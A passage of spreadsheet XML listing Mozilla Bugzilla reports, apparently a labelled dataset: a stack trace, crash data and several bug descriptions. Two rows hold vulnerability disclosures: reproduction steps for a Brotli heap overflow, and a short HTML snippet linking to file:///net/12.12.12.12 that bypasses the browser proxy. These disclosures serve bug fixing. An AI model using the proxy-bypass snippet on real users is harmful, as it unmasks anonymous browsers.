    #16 js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, js::AbstractFramePtr, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:824:13 (libxul.so+0x96f7272) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #17 js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:856:10 (libxul.so+0x96f7439) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #18 ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:520:10 (libxul.so+0x8869d48) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #19 JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:544:10 (libxul.so+0x8869f00) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #20 mozilla::dom::JSExecutionContext::ExecScript() /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296:8 (libxul.so+0x2c12c8b) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #21 ExecuteCompiledScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2139:16 (libxul.so+0x5915425) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #22 mozilla::dom::ScriptLoader::EvaluateScript(nsIGlobalObject*, JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2402:12 (libxul.so+0x5915425)
    #23 mozilla::dom::ScriptLoader::EvaluateScriptElement(JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2208:10 (libxul.so+0x5914a00) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #24 mozilla::dom::ScriptLoader::ProcessRequest(JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1858:10 (libxul.so+0x5911546) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #25 mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, JS::loader::ScriptKind) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1269:10 (libxul.so+0x590f83c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #26 mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:910:10 (libxul.so+0x59051d2) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #27 mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118:18 (libxul.so+0x5904cc5) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #28 AttemptToExecute /builds/worker/workspace/obj-build/dist/include/nsIScriptElement.h:221:18 (libxul.so+0x2281a42) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #29 nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:942:22 (libxul.so+0x2281a42)
    #30 nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:733:7 (libxul.so+0x227f7c9) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #31 nsHtml5ExecutorFlusher::Run() /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174:18 (libxul.so+0x2284b9d) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #32 mozilla::SchedulerGroup::Runnable::Run() /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140:20 (libxul.so+0x11bbebf) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #33 mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:538:16 (libxul.so+0x11f0b77) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #34 mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:851:26 (libxul.so+0x11c68a7) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #35 mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:683:15 (libxul.so+0x11c4d16) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #36 mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:461:36 (libxul.so+0x11c4ff4) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #37 operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:187:37 (libxul.so+0x11f4957) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #38 mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5 (libxul.so+0x11f4957)
    #39 nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1205:16 (libxul.so+0x11daf52) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #40 NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10 (libxul.so+0x11e1645) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #41 mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21 (libxul.so+0x1e465bb) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #42 mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:268:30 (libxul.so+0x1e470eb) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #43 RunInternal /builds/worker/checkouts/g</t>
        </is>
      </c>
      <c r="X951" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="952">
      <c r="A952" t="n">
        <v>321598</v>
      </c>
      <c r="B952" t="inlineStr">
        <is>
          <t>2005-12-27 03:44:23 -0800</t>
        </is>
      </c>
      <c r="C952" t="inlineStr">
        <is>
          <t>Double memory free in nsIX509::getRawDER when called from JavaScript</t>
        </is>
      </c>
      <c r="D952" t="inlineStr">
        <is>
          <t>2006-06-02 17:35:43 -0700</t>
        </is>
      </c>
      <c r="E952" t="n">
        <v>1</v>
      </c>
      <c r="F952" t="n">
        <v>1</v>
      </c>
      <c r="G952" t="n">
        <v>3</v>
      </c>
      <c r="H952" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I952" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J952" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K952" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L952" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M952" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N952" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O952" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P952" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q952" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R952" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S952" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T952" t="n">
        <v>1</v>
      </c>
      <c r="U952" t="n">
        <v>0</v>
      </c>
      <c r="V952" t="n">
        <v>32</v>
      </c>
      <c r="W952" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051224 Debian/1.5.dfsg-3 Firefox/1.5
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051224 Debian/1.5.dfsg-3 Firefox/1.5
While i call the getRawDER function of nsIX509Cert (security/manager/ssl/public) it freeze in all mozilla browser and firefox (except 1.5 [windows/linux] and mozilla 1.8b1 [linux] no extension installed success, opening other bug request for these);
I'm call the function in a javascript and native mode, but both freeze the browser.
----------------
JavaScript
----------------
    try{
      netscape.security.PrivilegeManager.enablePrivilege( "UniversalXPConnect");
	...
      if(cert instanceof Components.interfaces.nsIX509Cert){
		var length = {value:0};
   		var data=[];
   		data = cert.getRawDER(length);// &lt;-- travamento
	}
   }catch(err){
        alert("Erro: " + err);
   }
-----------------
C++
-----------------
/* void getCertBase64 (in nsIX509Cert cert, [retval] out string textbase64); */
NS_IMETHODIMP BRTIWebSignatureVerifier::GetCertBase64(nsIX509Cert *cert, char **textbase64)
{
	nsresult rv;
	PRUint32 length = 0;
	PRUint8 *data = nsnull;    
	//verifica parametro
	if(cert == nsnull){
		rv = NS_ERROR_INVALID_ARG;
		goto fim;
	}
	//GetRawDER(PRUint32 *length, PRUint8 **data)
	rv = cert-&gt;GetRawDER(&amp;length, &amp;data);// &lt;-- travamento
	if (rv != NS_OK){
		goto fim;
	}
	//codifica base64
    rv = encode(data, length, textbase64);
	if (rv != NS_OK){
		goto fim;
	}
fim:	
	//if (data) nsMemory::Free(data);
	return rv;
}
Reproducible: Always
Steps to Reproduce:
1. Open http://www.nerdgroup.org/staff/fernando/html/ns/index-env.html
2. Install the extension in botton page with root user
3. Write any text message in the 'text' area.
4. Click in 'Enviar' button.
Actual Results:  
It freeze the browser.
Expected Results:  
show encrypted message in other text area.</t>
        </is>
      </c>
      <c r="X952" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="953">
      <c r="A953" t="n">
        <v>572603</v>
      </c>
      <c r="B953" t="inlineStr">
        <is>
          <t>2010-06-16 20:30:31 -0700</t>
        </is>
      </c>
      <c r="C953" t="inlineStr">
        <is>
          <t>If $action eq 'none' in process_bug.cgi, recent_search_for dies</t>
        </is>
      </c>
      <c r="D953" t="inlineStr">
        <is>
          <t>2010-06-23 17:50:20 -0700</t>
        </is>
      </c>
      <c r="E953" t="n">
        <v>1</v>
      </c>
      <c r="F953" t="n">
        <v>1</v>
      </c>
      <c r="G953" t="n">
        <v>4</v>
      </c>
      <c r="H953" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I953" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J953" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K953" t="inlineStr">
        <is>
          <t>3.7</t>
        </is>
      </c>
      <c r="L953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N953" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O953" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P953" t="inlineStr"/>
      <c r="Q953" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R953" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S953" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T953" t="n">
        <v>1</v>
      </c>
      <c r="U953" t="n">
        <v>0</v>
      </c>
      <c r="V953" t="n">
        <v>6</v>
      </c>
      <c r="W953" t="inlineStr">
        <is>
          <t>If there's no "bug" object passed to the template in navigate.html.tmpl, recent_search_for dies. I think that's probably OK--it helps us catch errors in how we're calling the templates. However, we should certainly be setting $vars-&gt;{bug} to something sensible so that this error stops happening.</t>
        </is>
      </c>
      <c r="X953" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="954">
      <c r="A954" t="n">
        <v>1328584</v>
      </c>
      <c r="B954" t="inlineStr">
        <is>
          <t>2017-01-04 05:16:35 -0800</t>
        </is>
      </c>
      <c r="C954" t="inlineStr">
        <is>
          <t>History Item navigates to incorrect URL</t>
        </is>
      </c>
      <c r="D954" t="inlineStr">
        <is>
          <t>2017-01-24 08:16:17 -0800</t>
        </is>
      </c>
      <c r="E954" t="n">
        <v>1</v>
      </c>
      <c r="F954" t="n">
        <v>1</v>
      </c>
      <c r="G954" t="n">
        <v>2</v>
      </c>
      <c r="H954" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I954" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J954" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K954" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L954" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M954" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N954" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O954" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P954" t="inlineStr">
        <is>
          <t>[mobileCore]</t>
        </is>
      </c>
      <c r="Q954" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R954" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S954" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T954" t="n">
        <v>1</v>
      </c>
      <c r="U954" t="n">
        <v>0</v>
      </c>
      <c r="V954" t="n">
        <v>9</v>
      </c>
      <c r="W954" t="inlineStr">
        <is>
          <t>I visited http://m.huffpost.com/US sometime last month. And so, it is correctly listed in my History Panel (under "Last month"). Now, when I tap it, it takes me to, what looks like, the URL referenced by another history item.
In the screenshot I've attached of last month's history panel, you'll see that it lists "huffpost.com/US, huffpost.in, google, tim cook (google result)". When I tapped "huffpost.com/US", it took me to URLs referenced by these other history items. See the history panel screenshot of "today". It's not just google search URLs that it takes me to. Above was just an example. It took me to other sites from my history like msn.com, goodreads.com, etc.</t>
        </is>
      </c>
      <c r="X954" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="955">
      <c r="A955" t="n">
        <v>453403</v>
      </c>
      <c r="B955" t="inlineStr">
        <is>
          <t>2008-09-02 21:41:12 -0700</t>
        </is>
      </c>
      <c r="C955" t="inlineStr">
        <is>
          <t>add DNS pre-fetching to Necko and Firefox</t>
        </is>
      </c>
      <c r="D955" t="inlineStr">
        <is>
          <t>2012-03-29 02:11:33 -0700</t>
        </is>
      </c>
      <c r="E955" t="n">
        <v>1</v>
      </c>
      <c r="F955" t="n">
        <v>1</v>
      </c>
      <c r="G955" t="n">
        <v>3</v>
      </c>
      <c r="H955" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I955" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J955" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K955" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L955" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M955" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N955" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O955" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P955" t="inlineStr"/>
      <c r="Q955" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R955" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S955" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T955" t="n">
        <v>1</v>
      </c>
      <c r="U955" t="n">
        <v>6</v>
      </c>
      <c r="V955" t="n">
        <v>88</v>
      </c>
      <c r="W955" t="inlineStr">
        <is>
          <t>Not sure what it actually does but Google's Chrome beta has a "enable DNS pre-fetching" preferences and if it's what I think it is, we should do something like that.
I figure we could either pre-fetch DNS for all links, visible links (in the viewport,) or links that get a mouse hover for some millisecond count.</t>
        </is>
      </c>
      <c r="X955" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="956">
      <c r="A956" t="n">
        <v>805745</v>
      </c>
      <c r="B956" t="inlineStr">
        <is>
          <t>2012-10-26 00:32:25 -0700</t>
        </is>
      </c>
      <c r="C956" t="inlineStr">
        <is>
          <t>crash in nsWindow::OnPaint</t>
        </is>
      </c>
      <c r="D956" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:39 -0700</t>
        </is>
      </c>
      <c r="E956" t="n">
        <v>1</v>
      </c>
      <c r="F956" t="n">
        <v>1</v>
      </c>
      <c r="G956" t="n">
        <v>3</v>
      </c>
      <c r="H956" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I956" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J956" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K956" t="inlineStr">
        <is>
          <t>19 Branch</t>
        </is>
      </c>
      <c r="L956" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M956" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N956" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O956" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P956" t="inlineStr">
        <is>
          <t>[startupcrash][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q956" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R956" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S956" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T956" t="n">
        <v>1</v>
      </c>
      <c r="U956" t="n">
        <v>0</v>
      </c>
      <c r="V956" t="n">
        <v>94</v>
      </c>
      <c r="W956" t="inlineStr">
        <is>
          <t>It first appeared in 19.0a1/20121025. The regression range is:
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=93cc1ee94291&amp;tochange=5c82f5a5e90d
Signature 	mozilla::layers::ImageContainer::Release() More Reports Search
UUID	08f4bce0-c20d-4cee-bee6-221822121026
Date Processed	2012-10-26 07:17:09
Uptime	16
Install Age	16 seconds since version was first installed.
Install Time	2012-10-26 07:16:28
Product	Firefox
Version	19.0a1
Build ID	20121025030620
Release Channel	nightly
OS	Windows NT
OS Version	6.1.7601 Service Pack 1
Build Architecture	x86
Build Architecture Info	AuthenticAMD family 16 model 6 stepping 2
Crash Reason	EXCEPTION_ACCESS_VIOLATION_WRITE
Crash Address	0x740075
App Notes 	
AdapterVendorID: 0x1002, AdapterDeviceID: 0x68e0, AdapterSubsysID: 00000000, AdapterDriverVersion: 8.713.3.0
D3D10 Layers? D3D10 Layers- 
Processor Notes 	This dump is too long and has triggered the automatic truncation routine
EMCheckCompatibility	True
Adapter Vendor ID	0x1002
Adapter Device ID	0x68e0
Total Virtual Memory	4294836224
Available Virtual Memory	3903037440
System Memory Use Percentage	55
Available Page File	2922856448
Available Physical Memory	951963648
Frame 	Module 	Signature 	Source
0 	xul.dll 	mozilla::layers::ImageContainer::Release 	obj-firefox/dist/include/ImageContainer.h:265
1 	xul.dll 	nsRefPtr&lt;mozilla::layers::ImageContainer&gt;::~nsRefPtr&lt;mozilla::layers::ImageConta 	obj-firefox/dist/include/nsAutoPtr.h:874
2 	xul.dll 	mozilla::layers::ImageLayer::~ImageLayer 	gfx/layers/ImageLayers.cpp:18
3 	xul.dll 	mozilla::layers::ImageLayer::`scalar deleting destructor' 	
4 	xul.dll 	nsWindow::OnPaint 	widget/windows/nsWindowGfx.cpp:420
5 	xul.dll 	nsWindow::ProcessMessage 	widget/windows/nsWindow.cpp:4727
6 	xul.dll 	nsWindow::WindowProcInternal 	widget/windows/nsWindow.cpp:4336
7 	xul.dll 	CallWindowProcCrashProtected 	xpcom/base/nsCrashOnException.cpp:32
8 	xul.dll 	nsWindow::WindowProc 	widget/windows/nsWindow.cpp:4282
9 	user32.dll 	InternalCallWinProc 	
10 	user32.dll 	NtUserGetDC 	
11 	user32.dll 	DispatchClientMessage 	
12 	user32.dll 	__fnDWORD 	
13 	ntdll.dll 	KiUserCallbackDispatcher 	
14 	ntdll.dll 	KiUserApcDispatcher 	
15 	xul.dll 	nsWindow::Show 	widget/windows/nsWindow.cpp:1189
16 	xul.dll 	nsXULWindow::SetVisibility 	xpfe/appshell/src/nsXULWindow.cpp:795
17 	xul.dll 	nsXULWindow::OnChromeLoaded 	xpfe/appshell/src/nsXULWindow.cpp:992
18 	xul.dll 	nsWebShellWindow::OnStateChange 	xpfe/appshell/src/nsWebShellWindow.cpp:563
19 	xul.dll 	nsDocLoader::DoFireOnStateChange 	uriloader/base/nsDocLoader.cpp:1351
20 	xul.dll 	nsDocLoader::doStopDocumentLoad 	uriloader/base/nsDocLoader.cpp:942
...
More reports at:
https://crash-stats.mozilla.com/report/list?signature=mozilla%3A%3Alayers%3A%3AImageContainer%3A%3ARelease%28%29</t>
        </is>
      </c>
      <c r="X956" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="957">
      <c r="A957" t="n">
        <v>1246742</v>
      </c>
      <c r="B957" t="inlineStr">
        <is>
          <t>2016-02-08 12:18:04 -0800</t>
        </is>
      </c>
      <c r="C957" t="inlineStr">
        <is>
          <t>Security: Buffer overflow in Brotli decompression</t>
        </is>
      </c>
      <c r="D957" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:13 -0700</t>
        </is>
      </c>
      <c r="E957" t="n">
        <v>1</v>
      </c>
      <c r="F957" t="n">
        <v>1</v>
      </c>
      <c r="G957" t="n">
        <v>3</v>
      </c>
      <c r="H957" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I957" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J957" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K957" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L957" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M957" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N957" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O957" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P957" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main45+] merged into bug that included upstream patch for this issue (see comment 2)</t>
        </is>
      </c>
      <c r="Q957" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R957" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S957" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T957" t="n">
        <v>0</v>
      </c>
      <c r="U957" t="n">
        <v>0</v>
      </c>
      <c r="V957" t="n">
        <v>10</v>
      </c>
      <c r="W957" t="inlineStr">
        <is>
          <t>Created attachment 8717115
crash.compressed
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Steps to reproduce:
Using AFL, I discovered a pointer underflow bug in brotli decompression that leads to a buffer overflow on the heap.
Reproduction steps:
git clone https://github.com/google/brotli.git
cd brotli
git checkout d4f0cb98411491ade114158f363d8693e89ab473
cd tools
make -j 
setarch x86_64 -R  ./bro --decompress --input  crash.compressed  &gt; /dev/null 
Two notes:
1. ASLR can be disabled (with setarch) to reproduce reliably. This is because pointer underflow occurs when the ringbuffer has a low-enough address space.
2. git checkout because the trunk of brotli has already been patched by the Google team. Alternatively, use Firefox's dec/ folder when making the binary to reproduce using code in Firefox's trunk.
This was introduced in Aug 2015 to brotli trunk: https://github.com/google/brotli/commit/94cd7085f79a707f5ba3d93086796e695b495975. Firefox trunk (and possibly other versions) contain the vulnerable version of the brotli source code.
I have already submitted this report to Chrome, who informed me that I can report this to you guys as well. The brotli team patched this in their trunk: https://github.com/google/brotli/commit/33aa40220b96cf95ad2b9ba61dc8d7fd2f964f2c and additionally cherry-picked this patch into Chrome 48, 49, and Chromium. Here is an example of one of their patchsets: https://codereview.chromium.org/1672793002
Actual results:
Segmentation fault due to heap buffer overflow
Expected results:
No segmentation fault</t>
        </is>
      </c>
      <c r="X957" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="958">
      <c r="A958" t="n">
        <v>1412081</v>
      </c>
      <c r="B958" t="inlineStr">
        <is>
          <t>2017-10-26 12:25:34 -0700</t>
        </is>
      </c>
      <c r="C958" t="inlineStr">
        <is>
          <t>(CVE-2017-16541) Proxy bypass caused by autofs on Mac, Linux</t>
        </is>
      </c>
      <c r="D958" t="inlineStr">
        <is>
          <t>2019-08-07 17:04:05 -0700</t>
        </is>
      </c>
      <c r="E958" t="n">
        <v>1</v>
      </c>
      <c r="F958" t="n">
        <v>1</v>
      </c>
      <c r="G958" t="n">
        <v>3</v>
      </c>
      <c r="H958" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I958" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J958" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K958" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L958" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M958" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N958" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O958" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P958" t="inlineStr">
        <is>
          <t>[tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage][adv-main62+][adv-esr60.2+]</t>
        </is>
      </c>
      <c r="Q958" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R958" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S958" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T958" t="n">
        <v>1</v>
      </c>
      <c r="U958" t="n">
        <v>0</v>
      </c>
      <c r="V958" t="n">
        <v>127</v>
      </c>
      <c r="W958" t="inlineStr">
        <is>
          <t>Tor Project received a third-party report of a method for content pages to bypass the proxy. STR:
Create a web page with the following:
&lt;head&gt;
&lt;link href='file:///net/12.12.12.12/a.css' rel='stylesheet'&gt;
&lt;/head&gt;
Run a "tcpdump port 111" on 12.12.12.12. UDP events are observed that did not pass through the browser proxy.
(A demo is at https://pearlcrescent.com/tor/am.html)
I also observed the same thing for &lt;img&gt; tags. This behavior apparently is caused by automount/autofs, which is enabled by default on macOS and installable on Linux.
More information from a colleague:
My quick test on OSX 10.12.x shows that Chrome and Safari (latest versions) are not affected.
It is also interesting that I see the following message in the browser console after the page load completes (i.e., after it gives up on the automounted file):
Security Error: Content at https://pearlcrescent.com/tor/am.html may not load or link to file:///net/192.168.1.43/a.css.
Access is blocked (i.e., the CSS does not load, the image does not load), but only after an attempt has been made to open the file (or maybe just traverse its path.</t>
        </is>
      </c>
      <c r="X958" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="959">
      <c r="A959" t="n">
        <v>711673</v>
      </c>
      <c r="B959" t="inlineStr">
        <is>
          <t>2011-12-16 18:25:30 -0800</t>
        </is>
      </c>
      <c r="C959" t="inlineStr">
        <is>
          <t>x86 builds not being signed</t>
        </is>
      </c>
      <c r="D959" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E959" t="n">
        <v>1</v>
      </c>
      <c r="F959" t="n">
        <v>1</v>
      </c>
      <c r="G959" t="n">
        <v>5</v>
      </c>
      <c r="H959" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I959" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J959" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K959" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L959" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M959" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N959" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O959" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P959" t="inlineStr"/>
      <c r="Q959" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R959" t="inlineStr">
        <is>
